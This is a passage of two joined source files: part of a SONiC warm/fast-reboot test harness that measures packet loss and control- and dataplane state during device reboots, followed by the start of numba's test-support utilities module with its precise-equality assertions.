self.handle_post_reboot_test_reports()
def neigh_lag_status_check(self):
"""
Ensure there are no interface flaps after warm-boot
"""
for neigh in self.ssh_targets:
self.neigh_handle = Arista(neigh, None, self.test_params)
self.neigh_handle.connect()
fails, flap_cnt = self.neigh_handle.verify_neigh_lag_no_flap()
self.neigh_handle.disconnect()
self.fails[neigh] |= fails
if not flap_cnt:
self.log("No LAG flaps seen on %s after warm boot" % neigh)
else:
self.fails[neigh].add("LAG flapped %s times on %s after warm boot" % (flap_cnt, neigh))
def check_sonic_version_after_reboot(self):
# Check sonic version after reboot
target_version = self.test_params['target_version']
if target_version:
stdout, stderr, return_code = self.dut_connection.execCommand("sudo sonic_installer list | grep Current | awk '{print $2}'")
current_version = ""
if stdout != []:
current_version = str(stdout[0]).replace('\n', '')
self.log("Current={} Target={}".format(current_version, target_version))
if current_version != target_version:
raise Exception("Sonic upgrade failed. Target={} Current={}".format(\
target_version, current_version))
def extract_no_cpu_replies(self, arr):
"""
This function tries to extract number of replies from dataplane, when control plane is non working
"""
# remove all tail zero values
non_zero = filter(lambda x : x > 0, arr)
# check that last value is different from previos
if len(non_zero) > 1 and non_zero[-1] < non_zero[-2]:
return non_zero[-2]
else:
return non_zero[-1]
def reboot_dut(self):
time.sleep(self.reboot_delay)
if not self.kvm_test and\
(self.reboot_type == 'fast-reboot' or 'warm-reboot' in self.reboot_type):
self.sender_thr = threading.Thread(target = self.send_in_background)
self.sniff_thr = threading.Thread(target = self.sniff_in_background)
self.sniffer_started = threading.Event() # Event for the sniff_in_background status.
self.sniff_thr.start()
self.sender_thr.start()
self.log("Rebooting remote side")
stdout, stderr, return_code = self.dut_connection.execCommand("sudo " + self.reboot_type, timeout=30)
if stdout != []:
self.log("stdout from %s: %s" % (self.reboot_type, str(stdout)))
if stderr != []:
self.log("stderr from %s: %s" % (self.reboot_type, str(stderr)))
self.fails['dut'].add("{} failed with error {}".format(self.reboot_type, stderr))
thread.interrupt_main()
raise Exception("{} failed with error {}".format(self.reboot_type, stderr))
self.log("return code from %s: %s" % (self.reboot_type, str(return_code)))
# Note: a timeout reboot in ssh session will return a 255 code
if return_code not in [0, 255]:
thread.interrupt_main()
return
def cmd(self, cmds):
process = subprocess.Popen(cmds,
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return_code = process.returncode
return stdout, stderr, return_code
def peer_state_check(self, ip, queue):
self.log('SSH thread for VM {} started'.format(ip))
ssh = Arista(ip, queue, self.test_params, log_cb=self.log)
self.fails[ip], self.info[ip], self.cli_info[ip], self.logs_info[ip], self.lacp_pdu_times[ip] = ssh.run()
self.log('SSH thread for VM {} finished'.format(ip))
lacp_pdu_times = self.lacp_pdu_times[ip]
lacp_pdu_down_times = lacp_pdu_times.get("lacp_down")
lacp_pdu_up_times = lacp_pdu_times.get("lacp_up")
self.log('lacp_pdu_down_times: IP:{}: {}'.format(ip, lacp_pdu_down_times))
self.log('lacp_pdu_up_times: IP:{}: {}'.format(ip, lacp_pdu_up_times))
lacp_pdu_before_reboot = float(lacp_pdu_down_times[-1]) if\
lacp_pdu_down_times and len(lacp_pdu_down_times) > 0 else None
lacp_pdu_after_reboot = float(lacp_pdu_up_times[0]) if\
lacp_pdu_up_times and len(lacp_pdu_up_times) > 0 else None
if 'warm-reboot' in self.reboot_type and lacp_pdu_before_reboot and lacp_pdu_after_reboot:
lacp_time_diff = lacp_pdu_after_reboot - lacp_pdu_before_reboot
if lacp_time_diff >= 90 and not self.kvm_test:
self.fails['dut'].add("LACP session likely terminated by neighbor ({})".format(ip) +\
" post-reboot lacpdu came after {}s of lacpdu pre-boot".format(lacp_time_diff))
else:
lacp_time_diff = None
self.lacp_session_pause[ip] = lacp_time_diff
def wait_until_cpu_port_down(self, signal):
while not signal.is_set():
for _, q in self.ssh_jobs:
self.put_nowait(q, 'cpu_going_down')
if self.cpu_state.get() == 'down':
for _, q in self.ssh_jobs:
q.put('cpu_down')
break
time.sleep(self.TIMEOUT)
def wait_until_cpu_port_up(self, signal):
while not signal.is_set():
for _, q in self.ssh_jobs:
self.put_nowait(q, 'cpu_going_up')
if self.cpu_state.get() == 'up':
for _, q in self.ssh_jobs:
q.put('cpu_up')
break
time.sleep(self.TIMEOUT)
def apply_filter_all_ports(self, filter_expression):
for p in self.dataplane.ports.values():
port = p.get_packet_source()
scapyall.attach_filter(port.socket, filter_expression)
def send_in_background(self, packets_list = None, interval = None):
"""
This method sends predefined list of packets with predefined interval.
"""
if not interval:
interval = self.send_interval
if not packets_list:
packets_list = self.packets_list
self.sniffer_started.wait(timeout=10)
with self.dataplane_io_lock:
sent_packet_count = 0
# While running fast data plane sender thread there are two reasons for filter to be applied
# 1. filter out data plane traffic which is tcp to free up the load on PTF socket (sniffer thread is using a different one)
# 2. during warm neighbor restoration DUT will send a lot of ARP requests which we are not interested in
# This is essential to get stable results
self.apply_filter_all_ports('not (arp and ether src {}) and not tcp'.format(self.test_params['dut_mac']))
sender_start = datetime.datetime.now()
self.log("Sender started at %s" % str(sender_start))
for entry in packets_list:
time.sleep(interval)
if self.vnet:
testutils.send_packet(self, entry[0], entry[1].decode("base64"))
else:
testutils.send_packet(self, *entry)
sent_packet_count += 1
self.log("Sender has been running for %s" % str(datetime.datetime.now() - sender_start))
self.log("Total sent packets by sender: {}".format(sent_packet_count))
# Signal sniffer thread to allow early finish.
# Without this signalling mechanism, the sniffer thread can continue for a hardcoded max time.
# Sometimes this max time is too long and sniffer keeps running too long after sender finishes.
# Other times, sniffer finishes too early (when max time is less) while the sender is still sending packets.
# So now:
# 1. sniffer max timeout is increased (to prevent sniffer finish before sender)
# 2. and sender can signal sniffer to end after all packets are sent.
time.sleep(1)
kill_sniffer_cmd = "pkill -SIGINT -f {}".format(self.ptf_sniffer)
subprocess.Popen(kill_sniffer_cmd.split())
self.apply_filter_all_ports('')
def sniff_in_background(self, wait = None):
"""
This function listens on all ports, in both directions, for the TCP src=1234 dst=5000 packets, until timeout.
Once found, all packets are dumped to local pcap file,
and all packets are saved to self.packets as scapy type.
The native scapy.snif() is used as a background thread, to allow delayed start for the send_in_background().
"""
if not wait:
wait = self.time_to_listen + self.test_params['sniff_time_incr']
sniffer_start = datetime.datetime.now()
self.log("Sniffer started at %s" % str(sniffer_start))
sniff_filter = "tcp and tcp dst port 5000 and tcp src port 1234 and not icmp"
scapy_sniffer = threading.Thread(target=self.scapy_sniff,
kwargs={'wait': wait, 'sniff_filter': sniff_filter})
scapy_sniffer.start()
time.sleep(2) # Let the scapy sniff initialize completely.
self.sniffer_started.set() # Unblock waiter for the send_in_background.
scapy_sniffer.join()
self.log("Sniffer has been running for %s" % str(datetime.datetime.now() - sniffer_start))
self.sniffer_started.clear()
def scapy_sniff(self, wait=300, sniff_filter=''):
"""
@summary: PTF runner - runs a sniffer in PTF container.
Args:
wait (int): Duration in seconds to sniff the traffic
sniff_filter (str): Filter that Scapy will use to collect only relevant packets
"""
capture_pcap = "/tmp/capture_%s.pcap" % self.logfile_suffix if self.logfile_suffix is not None else "/tmp/capture.pcap"
capture_log = "/tmp/capture.log"
self.ptf_sniffer = "/root/ptftests/advanced_reboot_sniffer.py"
sniffer_command = ["python", self.ptf_sniffer, "-f", "'{}'".format(sniff_filter), "-p",\
capture_pcap, "-l", capture_log, "-t" , str(wait)]
subprocess.call(["rm", "-rf", capture_pcap]) # remove old capture
subprocess.call(sniffer_command)
self.packets = scapyall.rdpcap(capture_pcap)
self.log("Number of all packets captured: {}".format(len(self.packets)))
def send_and_sniff(self):
"""
This method starts two background threads in parallel:
one for sending, another for collecting the sent packets.
"""
self.sender_thr = threading.Thread(target = self.send_in_background)
self.sniff_thr = threading.Thread(target = self.sniff_in_background)
self.sniffer_started = threading.Event() # Event for the sniff_in_background status.
self.sniff_thr.start()
self.sender_thr.start()
self.sniff_thr.join()
self.sender_thr.join()
def check_tcp_payload(self, packet):
"""
This method is used by examine_flow() method.
It returns True if a packet is not corrupted and has a valid TCP sequential TCP Payload, as created by generate_bidirectional() method'.
"""
try:
int(str(packet[scapyall.TCP].payload)) in range(self.packets_to_send)
return True
except Exception as err:
return False
def no_flood(self, packet):
"""
This method filters packets which are unique (i.e. no floods).
"""
if (not int(str(packet[scapyall.TCP].payload)) in self.unique_id) and (packet[scapyall.Ether].src == self.dut_mac):
# This is a unique (no flooded) received packet.
self.unique_id.append(int(str(packet[scapyall.TCP].payload)))
return True
elif packet[scapyall.Ether].dst == self.dut_mac:
# This is a sent packet.
return True
else:
return False
def examine_flow(self, filename = None):
"""
This method examines pcap file (if given), or self.packets scapy file.
The method compares TCP payloads of the packets one by one (assuming all payloads are consecutive integers),
and the losses if found - are treated as disruptions in Dataplane forwarding.
All disruptions are saved to self.lost_packets dictionary, in format:
disrupt_start_id = (missing_packets_count, disrupt_time, disrupt_start_timestamp, disrupt_stop_timestamp)
"""
if filename:
all_packets = scapyall.rdpcap(filename)
elif self.packets:
all_packets = self.packets
else:
self.log("Filename and self.packets are not defined.")
self.fails['dut'].add("Filename and self.packets are not defined")
return None
# Filter out packets and remove floods:
self.unique_id = list() # This list will contain all unique Payload ID, to filter out received floods.
filtered_packets = [ pkt for pkt in all_packets if
scapyall.TCP in pkt and
not scapyall.ICMP in pkt and
pkt[scapyall.TCP].sport == 1234 and
pkt[scapyall.TCP].dport == 5000 and
self.check_tcp_payload(pkt) and
self.no_flood(pkt)
]
if self.vnet:
decap_packets = [ scapyall.Ether(str(pkt.payload.payload.payload)[8:]) for pkt in all_packets if
scapyall.UDP in pkt and
pkt[scapyall.UDP].sport == 1234
]
filtered_decap_packets = [ pkt for pkt in decap_packets if
scapyall.TCP in pkt and
not scapyall.ICMP in pkt and
pkt[scapyall.TCP].sport == 1234 and
pkt[scapyall.TCP].dport == 5000 and
self.check_tcp_payload(pkt) and
self.no_flood(pkt)
]
filtered_packets = filtered_packets + filtered_decap_packets
# Re-arrange packets, if delayed, by Payload ID and Timestamp:
packets = sorted(filtered_packets, key = lambda packet: (int(str(packet[scapyall.TCP].payload)), packet.time ))
self.lost_packets = dict()
self.max_disrupt, self.total_disruption = 0, 0
sent_packets = dict()
self.fails['dut'].add("Sniffer failed to capture any traffic")
self.assertTrue(packets, "Sniffer failed to capture any traffic")
self.fails['dut'].clear()
if packets:
prev_payload, prev_time = 0, 0
sent_payload = 0
received_counter = 0 # Counts packets from dut.
sent_counter = 0
received_t1_to_vlan = 0
received_vlan_to_t1 = 0
missed_vlan_to_t1 = 0
missed_t1_to_vlan = 0
self.disruption_start, self.disruption_stop = None, None
for packet in packets:
if packet[scapyall.Ether].dst == self.dut_mac:
# This is a sent packet - keep track of it as payload_id:timestamp.
sent_payload = int(str(packet[scapyall.TCP].payload))
sent_packets[sent_payload] = packet.time
sent_counter += 1
continue
if packet[scapyall.Ether].src == self.dut_mac:
# This is a received packet.
received_time = packet.time
received_payload = int(str(packet[scapyall.TCP].payload))
if (received_payload % 5) == 0 : # From vlan to T1.
received_vlan_to_t1 += 1
else:
received_t1_to_vlan += 1
received_counter += 1
if not (received_payload and received_time):
# This is the first valid received packet.
prev_payload = received_payload
prev_time = received_time
continue
if received_payload - prev_payload > 1:
# Packets in a row are missing, a disruption.
lost_id = (received_payload -1) - prev_payload # How many packets lost in a row.
disrupt = (sent_packets[received_payload] - sent_packets[prev_payload + 1]) # How long disrupt lasted.
# Add disrupt to the dict:
self.lost_packets[prev_payload] = (lost_id, disrupt, received_time - disrupt, received_time)
self.log("Disruption between packet ID %d and %d. For %.4f " % (prev_payload, received_payload, disrupt))
for lost_index in range(prev_payload + 1, received_payload):
if (lost_index % 5) == 0 : # lost received for packet sent from vlan to T1.
missed_vlan_to_t1 += 1
else:
missed_t1_to_vlan += 1
self.log("")
if not self.disruption_start:
self.disruption_start = datetime.datetime.fromtimestamp(prev_time)
self.disruption_stop = datetime.datetime.fromtimestamp(received_time)
prev_payload = received_payload
prev_time = received_time
self.log("**************** Packet received summary: ********************")
self.log("*********** Sent packets captured - {}".format(sent_counter))
self.log("*********** received packets captured - t1-to-vlan - {}".format(received_t1_to_vlan))
self.log("*********** received packets captured - vlan-to-t1 - {}".format(received_vlan_to_t1))
self.log("*********** Missed received packets - t1-to-vlan - {}".format(missed_t1_to_vlan))
self.log("*********** Missed received packets - vlan-to-t1 - {}".format(missed_vlan_to_t1))
self.log("**************************************************************")
self.fails['dut'].add("Sniffer failed to filter any traffic from DUT")
self.assertTrue(received_counter, "Sniffer failed to filter any traffic from DUT")
self.fails['dut'].clear()
self.disrupts_count = len(self.lost_packets) # Total disrupt counter.
if self.lost_packets:
# Find the longest loss with the longest time:
max_disrupt_from_id, (self.max_lost_id, self.max_disrupt_time, self.no_routing_start, self.no_routing_stop) = \
max(self.lost_packets.items(), key = lambda item:item[1][0:2])
self.total_disrupt_packets = sum([item[0] for item in self.lost_packets.values()])
self.total_disrupt_time = sum([item[1] for item in self.lost_packets.values()])
self.log("Disruptions happen between %s and %s after the reboot." % \
(str(self.disruption_start - self.reboot_start), str(self.disruption_stop - self.reboot_start)))
else:
self.max_lost_id = 0
self.max_disrupt_time = 0
self.total_disrupt_packets = 0
self.total_disrupt_time = 0
self.log("Gaps in forwarding not found.")
self.log("Total incoming packets captured %d" % received_counter)
if packets:
filename = '/tmp/capture_filtered.pcap' if self.logfile_suffix is None else "/tmp/capture_filtered_%s.pcap" % self.logfile_suffix
scapyall.wrpcap(filename, packets)
self.log("Filtered pcap dumped to %s" % filename)
def check_forwarding_stop(self, signal):
self.asic_start_recording_vlan_reachability()
while not signal.is_set():
state = self.asic_state.get()
for _, q in self.ssh_jobs:
self.put_nowait(q, 'check_stop')
if state == 'down':
break
time.sleep(self.TIMEOUT)
self.asic_stop_recording_vlan_reachability()
return self.asic_state.get_state_time(state), self.get_asic_vlan_reachability()
def check_forwarding_resume(self, signal):
while not signal.is_set():
state = self.asic_state.get()
if state != 'down':
break
time.sleep(self.TIMEOUT)
return self.asic_state.get_state_time(state), self.get_asic_vlan_reachability()
def ping_data_plane(self, light_probe=True):
self.dataplane.flush()
replies_from_servers = self.pingFromServers()
if replies_from_servers > 0 or not light_probe:
replies_from_upper = self.pingFromUpperTier()
else:
replies_from_upper = 0
return replies_from_servers, replies_from_upper
def wait_dut_to_warm_up(self):
# When the DUT is freshly rebooted, it appears that it needs to warm
# up towards PTF docker. In practice, I've seen this warm up taking
# up to ~70 seconds.
fail = None
dut_stabilize_secs = int(self.test_params['dut_stabilize_secs'])
warm_up_timeout_secs = int(self.test_params['warm_up_timeout_secs'])
start_time = datetime.datetime.now()
up_time = None
# First wait until DUT data/control planes are up
while True:
dataplane = self.asic_state.get()
ctrlplane = self.cpu_state.get()
elapsed = (datetime.datetime.now() - start_time).total_seconds()
if dataplane == 'up' and ctrlplane == 'up':
if not up_time:
up_time = datetime.datetime.now()
up_secs = (datetime.datetime.now() - up_time).total_seconds()
if up_secs > dut_stabilize_secs:
break
else:
# reset up_time
up_time = None
if elapsed > warm_up_timeout_secs:
raise Exception("Control plane didn't come up within warm up timeout")
time.sleep(1)
# check until flooding is over. Flooding happens when FDB entry of
# certain host is not yet learnt by the ASIC, therefore it sends
# packet to all vlan ports.
uptime = datetime.datetime.now()
while True:
elapsed = (datetime.datetime.now() - start_time).total_seconds()
if not self.asic_state.is_flooding() and elapsed > dut_stabilize_secs:
break
if elapsed > warm_up_timeout_secs:
if self.allow_vlan_flooding:
break
raise Exception("Data plane didn't stop flooding within warm up timeout")
time.sleep(1)
dataplane = self.asic_state.get()
ctrlplane = self.cpu_state.get()
if not dataplane == 'up':
fail = "Data plane"
elif not ctrlplane == 'up':
fail = "Control plane"
if fail is not None:
raise Exception("{} went down while waiting for flooding to stop".format(fail))
if self.asic_state.get_state_time('up') > uptime:
fail = "Data plane"
elif self.cpu_state.get_state_time('up') > uptime:
fail = "Control plane"
if fail is not None:
raise Exception("{} flapped while waiting for the warm up".format(fail))
# Everything is good
def clear_dut_counters(self):
# Clear the counters after the WARM UP is complete
# this is done so that drops can be accurately calculated
# after reboot test is finished
clear_counter_cmds = [ "sonic-clear counters",
"sonic-clear queuecounters",
"sonic-clear dropcounters",
"sonic-clear rifcounters",
"sonic-clear pfccounters"
]
if 'broadcom' in self.test_params['asic_type']:
clear_counter_cmds.append("bcmcmd 'clear counters'")
for cmd in clear_counter_cmds:
self.dut_connection.execCommand(cmd)
def check_alive(self):
# This function checks that DUT routes the packets in the both directions.
#
# Sometimes first attempt failes because ARP responses to DUT are not so fast.
# But after this the function expects to see steady "replies".
# If the function sees that there is an issue with the dataplane after we saw
# successful replies it considers that the DUT is not healthy
#
# Sometimes I see that DUT returns more replies then requests.
# I think this is because of not populated FDB table
# The function waits while it's done
uptime = None
for counter in range(self.nr_tests * 2):
state = self.asic_state.get()
if state == 'up':
if not uptime:
uptime = self.asic_state.get_state_time(state)
else:
if uptime:
raise Exception("Data plane stopped working")
time.sleep(2)
# wait, until FDB entries are populated
for _ in range(self.nr_tests * 10): # wait for some time
if self.asic_state.is_flooding():
time.sleep(2)
else:
break
else:
raise Exception("DUT is flooding")
def get_asic_vlan_reachability(self):
return self.asic_vlan_reach
def asic_start_recording_vlan_reachability(self):
with self.vlan_lock:
self.asic_vlan_reach = []
self.recording = True
def asic_stop_recording_vlan_reachability(self):
with self.vlan_lock:
self.recording = False
def try_record_asic_vlan_recachability(self, t1_to_vlan):
with self.vlan_lock:
if self.recording:
self.asic_vlan_reach.append(t1_to_vlan)
def log_asic_state_change(self, reachable, partial=False, t1_to_vlan=0, flooding=False):
old = self.asic_state.get()
if reachable:
state = 'up' if not partial else 'partial'
else:
state = 'down'
self.try_record_asic_vlan_recachability(t1_to_vlan)
self.asic_state.set_flooding(flooding)
if old != state:
self.log("Data plane state transition from %s to %s (%d)" % (old, state, t1_to_vlan))
self.asic_state.set(state)
def log_cpu_state_change(self, reachable, partial=False, flooding=False):
old = self.cpu_state.get()
if reachable:
state = 'up' if not partial else 'partial'
else:
state = 'down'
self.cpu_state.set_flooding(flooding)
if old != state:
self.log("Control plane state transition from %s to %s" % (old, state))
self.cpu_state.set(state)
def log_vlan_state_change(self, reachable):
old = self.vlan_state.get()
if reachable:
state = 'up'
else:
state = 'down'
if old != state:
self.log("VLAN ARP state transition from %s to %s" % (old, state))
self.vlan_state.set(state)
def reachability_watcher(self):
# This function watches the reachability of the CPU port, and ASIC. It logs the state
# changes for future analysis
self.watcher_is_stopped.clear() # Watcher is running.
while self.watching:
if self.dataplane_io_lock.acquire(False):
vlan_to_t1, t1_to_vlan = self.ping_data_plane(self.light_probe)
reachable = (t1_to_vlan > self.nr_vl_pkts * 0.7 and
vlan_to_t1 > self.nr_pc_pkts * 0.7)
partial = (reachable and
(t1_to_vlan < self.nr_vl_pkts or
vlan_to_t1 < self.nr_pc_pkts))
flooding = (reachable and
(t1_to_vlan > self.nr_vl_pkts or
vlan_to_t1 > self.nr_pc_pkts))
self.log_asic_state_change(reachable, partial, t1_to_vlan, flooding)
self.dataplane_io_lock.release()
total_rcv_pkt_cnt = self.pingDut()
reachable = total_rcv_pkt_cnt > 0 and total_rcv_pkt_cnt > self.ping_dut_pkts * 0.7
partial = total_rcv_pkt_cnt > 0 and total_rcv_pkt_cnt < self.ping_dut_pkts
flooding = reachable and total_rcv_pkt_cnt > self.ping_dut_pkts
self.log_cpu_state_change(reachable, partial, flooding)
total_rcv_pkt_cnt = self.arpPing()
reachable = total_rcv_pkt_cnt >= self.arp_ping_pkts
self.log_vlan_state_change(reachable)
self.watcher_is_running.set() # Watcher is running.
self.watcher_is_stopped.set() # Watcher has stopped.
self.watcher_is_running.clear() # Watcher has stopped.
def pingFromServers(self):
for i in xrange(self.nr_pc_pkts):
testutils.send_packet(self, self.from_server_src_port, self.from_vlan_packet)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.from_vlan_exp_packet, self.from_server_dst_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d servers->t1" % (self.nr_pc_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def pingFromUpperTier(self):
for entry in self.from_t1:
testutils.send_packet(self, *entry)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.from_t1_exp_packet, self.vlan_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d t1->servers" % (self.nr_vl_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def pingDut(self):
if "allow_mac_jumping" in self.test_params and self.test_params['allow_mac_jumping']:
for i in xrange(self.ping_dut_pkts):
testutils.send_packet(self, self.random_port(self.vlan_ports), self.ping_dut_macjump_packet)
else:
for i in xrange(self.ping_dut_pkts):
src_port, packet = random.choice(self.ping_dut_packets)
testutils.send_packet(self, src_port, packet)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.ping_dut_exp_packet, self.vlan_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d ping DUT" % (self.ping_dut_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def arpPing(self):
for i in xrange(self.arp_ping_pkts):
testutils.send_packet(self, self.arp_src_port, self.arp_ping)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.arp_resp, [self.arp_src_port], timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d arp ping" % (self.arp_ping_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
|
support.py
|
"""
Assorted utilities for use in tests.
"""
from __future__ import print_function
import cmath
import contextlib
import enum
import errno
import gc
import math
import os
import shutil
import subprocess
import sys
import tempfile
import time
import io
import ctypes
import multiprocessing as mp
from contextlib import contextmanager
import numpy as np
from numba import config, errors, typing, utils, numpy_support, testing
from numba.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
from numba.targets import cpu
import numba.unittest_support as unittest
from numba.runtime import rtsys
from numba.six import PY2
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
no_pyobj_flags = Flags()
nrt_flags = Flags()
nrt_flags.set("nrt")
tag = testing.make_tag_decorator(['important', 'long_running'])
_windows_py27 = (sys.platform.startswith('win32') and
sys.version_info[:2] == (2, 7))
_32bit = sys.maxsize <= 2 ** 32
_reason = 'parfors not supported'
skip_parfors_unsupported = unittest.skipIf(_32bit or _windows_py27, _reason)
class CompilationCache(object):
"""
A cache of compilation results for various signatures and flags.
This can make tests significantly faster (or less slow).
"""
def __init__(self):
self.typingctx = typing.Context()
self.targetctx = cpu.CPUContext(self.typingctx)
self.cr_cache = {}
def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
"""
Compile the function or retrieve an already compiled result
from the cache.
"""
from numba.targets.registry import cpu_target
cache_key = (func, args, return_type, flags)
try:
cr = self.cr_cache[cache_key]
except KeyError:
# Register the contexts in case for nested @jit or @overload calls
# (same as compile_isolated())
with cpu_target.nested_context(self.typingctx, self.targetctx):
cr = compile_extra(self.typingctx, self.targetctx, func,
args, return_type, flags, locals={})
self.cr_cache[cache_key] = cr
return cr
class TestCase(unittest.TestCase):
longMessage = True
# A random state yielding the same random numbers for any test case.
# Use as `self.random.<method name>`
@utils.cached_property
def random(self):
return np.random.RandomState(42)
def reset_module_warnings(self, module):
"""
Reset the warnings registry of a module. This can be necessary
as the warnings module is buggy in that regard.
See http://bugs.python.org/issue4180
"""
if isinstance(module, str):
module = sys.modules[module]
try:
del module.__warningregistry__
except AttributeError:
pass
@contextlib.contextmanager
def assertTypingError(self):
"""
A context manager that asserts the enclosed code block fails
compiling in nopython mode.
"""
_accepted_errors = (errors.LoweringError, errors.TypingError,
TypeError, NotImplementedError)
with self.assertRaises(_accepted_errors) as cm:
yield cm
@contextlib.contextmanager
def assertRefCount(self, *objects):
"""
A context manager that asserts the given objects have the
same reference counts before and after executing the
enclosed block.
"""
old_refcounts = [sys.getrefcount(x) for x in objects]
yield
new_refcounts = [sys.getrefcount(x) for x in objects]
for old, new, obj in zip(old_refcounts, new_refcounts, objects):
if old != new:
self.fail("Refcount changed from %d to %d for object: %r"
% (old, new, obj))
@contextlib.contextmanager
def assertNoNRTLeak(self):
"""
A context manager that asserts no NRT leak was created during
the execution of the enclosed block.
"""
old = rtsys.get_allocation_stats()
yield
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free,
"number of data allocs != number of data frees")
self.assertEqual(total_mi_alloc, total_mi_free,
"number of meminfo allocs != number of meminfo frees")
_bool_types = (bool, np.bool_)
_exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,), (utils.text_type), ]
_approx_typesets = [(float,), (complex,), (np.inexact)]
_sequence_typesets = [(tuple, list)]
_float_types = (float, np.floating)
_complex_types = (complex, np.complexfloating)
def _detect_family(self, numeric_object):
"""
This function returns a string description of the type family
that the object in question belongs to. Possible return values
are: "exact", "complex", "approximate", "sequence", and "unknown"
"""
if isinstance(numeric_object, np.ndarray):
return "ndarray"
if isinstance(numeric_object, enum.Enum):
return "enum"
for tp in self._sequence_typesets:
if isinstance(numeric_object, tp):
return "sequence"
for tp in self._exact_typesets:
if isinstance(numeric_object, tp):
return "exact"
for tp in self._complex_types:
if isinstance(numeric_object, tp):
return "complex"
for tp in self._approx_typesets:
if isinstance(numeric_object, tp):
return "approximate"
return "unknown"
def _fix_dtype(self, dtype):
"""
Fix the given *dtype* for comparison.
"""
# Under 64-bit Windows, Numpy may return either int32 or int64
# arrays depending on the function.
if (sys.platform == 'win32' and sys.maxsize > 2**32 and
dtype == np.dtype('int32')):
return np.dtype('int64')
else:
return dtype
def _fix_strides(self, arr):
"""
Return the strides of the given array, fixed for comparison.
Strides for 0- or 1-sized dimensions are ignored.
"""
if arr.size == 0:
return [0] * arr.ndim
else:
return [stride / arr.itemsize
for (stride, shape) in zip(arr.strides, arr.shape)
if shape > 1]
def assertStridesEqual(self, first, second):
"""
Test that two arrays have the same shape and strides.
"""
self.assertEqual(first.shape, second.shape, "shapes differ")
self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
self.assertEqual(self._fix_strides(first), self._fix_strides(second),
"strides differ")
def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None
):
"""
Versatile equality testing function with more built-in checks than
standard assertEqual().
For arrays, test that layout, dtype, shape are identical, and
recursively call assertPreciseEqual() on the contents.
For other sequences, recursively call assertPreciseEqual() on
the contents.
For scalars, test that two scalars or have similar types and are
equal up to a computed precision.
If the scalars are instances of exact types or if *prec* is
'exact', they are compared exactly.
If the scalars are instances of inexact types (float, complex)
and *prec* is not 'exact', then the number of significant bits
is computed according to the value of *prec*: 53 bits if *prec*
is 'double', 24 bits if *prec* is single. This number of bits
can be lowered by raising the *ulps* value.
ignore_sign_on_zero can be set to True if zeros are to be considered
equal regardless of their sign bit.
abs_tol if this is set to a float value its value is used in the
following. If, however, this is set to the string "eps" then machine
precision of the type(first) is used in the following instead. This
kwarg is used to check if the absolute difference in value between first
and second is less than the value set, if so the numbers being compared
are considered equal. (This is to handle small numbers typically of
magnitude less than machine precision).
Any value of *prec* other than 'exact', 'single' or 'double'
will raise an error.
"""
try:
self._assertPreciseEqual(first, second, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
except AssertionError as exc:
failure_msg = str(exc)
# Fall off of the 'except' scope to avoid Python 3 exception
# chaining.
else:
return
# Decorate the failure message with more information
self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))
def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None):
"""Recursive workhorse for assertPreciseEqual()."""
def _assertNumberEqual(first, second, delta=None):
if (delta is None or first == second == 0.0
or math.isinf(first) or math.isinf(second)):
self.assertEqual(first, second, msg=msg)
# For signed zeros
if not ignore_sign_on_zero:
try:
if math.copysign(1, first) != math.copysign(1, second):
self.fail(
self._formatMessage(msg,
"%s != %s" %
(first, second)))
except TypeError:
pass
else:
self.assertAlmostEqual(first, second, delta=delta, msg=msg)
first_family = self._detect_family(first)
second_family = self._detect_family(second)
assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
second_family)
if msg:
assertion_message += ': %s' % (msg,)
self.assertEqual(first_family, second_family, msg=assertion_message)
# We now know they are in the same comparison family
compare_family = first_family
# For recognized sequences, recurse
if compare_family == "ndarray":
dtype = self._fix_dtype(first.dtype)
self.assertEqual(dtype, self._fix_dtype(second.dtype))
self.assertEqual(first.ndim, second.ndim,
"different number of dimensions")
self.assertEqual(first.shape, second.shape,
"different shapes")
self.assertEqual(first.flags.writeable, second.flags.writeable,
"different mutability")
# itemsize is already checked by the dtype test above
self.assertEqual(self._fix_strides(first),
self._fix_strides(second), "different strides")
if first.dtype != dtype:
first = first.astype(dtype)
if second.dtype != dtype:
second = second.astype(dtype)
for a, b in zip(first.flat, second.flat):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "sequence":
self.assertEqual(len(first), len(second), msg=msg)
for a, b in zip(first, second):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "exact":
exact_comparison = True
elif compare_family in ["complex", "approximate"]:
exact_comparison = False
elif compare_family == "enum":
self.assertIs(first.__class__, second.__class__)
self._assertPreciseEqual(first.value, second.value,
prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "unknown":
# Assume these are non-numeric types: we will fall back
# on regular unittest comparison.
self.assertIs(first.__class__, second.__class__)
exact_comparison = True
else:
